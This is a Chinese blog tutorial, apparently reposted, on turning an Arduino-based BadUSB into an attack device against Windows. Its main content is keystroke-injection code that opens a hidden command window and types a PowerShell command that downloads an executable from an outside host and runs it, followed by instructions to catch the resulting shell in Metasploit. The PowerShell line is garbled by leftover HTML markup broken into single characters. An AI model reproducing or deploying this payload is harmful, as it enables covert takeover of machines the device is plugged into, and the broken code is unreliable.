准备
- badusb
- Arduino
下载软件
运行软件
在工具菜单中 选择,选择badusb的端口和开发版。
}
void loop()//循环
{
}
Shell
复制
windows7系统
#include <Keyboard.h>
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press(‘r’);//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release(‘r’);
delay(500);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.println(“CMD.EXE /t:01 /k MODE con: cols=16 lines=2”);
delay(1000);
Keyboard.println(“POWERSHELL -cOMMAND
C
L
N
T
<
/
s
p
a
n
>
=
N
E
W
−
O
B
J
E
C
T
s
Y
S
T
E
M
.
n
E
T
.
w
E
B
c
L
I
E
N
T
;
<
s
p
a
n
c
l
a
s
s
=
"
t
o
k
e
n
v
a
r
i
a
b
l
e
"
>
CLNT</span> = NEW-OBJECT sYSTEM.nET.wEBcLIENT;<span class="token variable">
CLNT</span>=NEW−OBJECTsYSTEM.nET.wEBcLIENT;<spanclass="tokenvariable">URL= ‘https://bbskali.cn/8888.exe’;
F
I
L
E
<
/
s
p
a
n
>
=
′
c
:
X
.
E
X
E
′
;
<
s
p
a
n
c
l
a
s
s
=
"
t
o
k
e
n
v
a
r
i
a
b
l
e
"
>
FILE</span> = ' c:\\X.EXE ';<span class="token variable">
FILE</span>=′c:X.EXE′;<spanclass="tokenvariable">CLNT.dOWNLOADfILE(
U
R
L
<
/
s
p
a
n
>
,
<
s
p
a
n
c
l
a
s
s
=
"
t
o
k
e
n
v
a
r
i
a
b
l
e
"
>
URL</span>,<span class="token variable">
URL</span>,<spanclass="tokenvariable">FILE);”);
delay(3000);
Keyboard.println(“C:\X.EXE&EXIT”);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
Shell
复制
其他代码
传送门
编译上传
成功如下:
配置监听
在msf中我们配置参数,插入badusb即可得到shell,需要注意的是,本代码仅支持win10对于win7和xp由于不能直接用powershell下载,所以以上代码不能实现。
版权属于:逍遥子
本文链接:https://blog.bbskali.cn/index.php/archives/806/
转载时须注明出处及本声明
2727
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
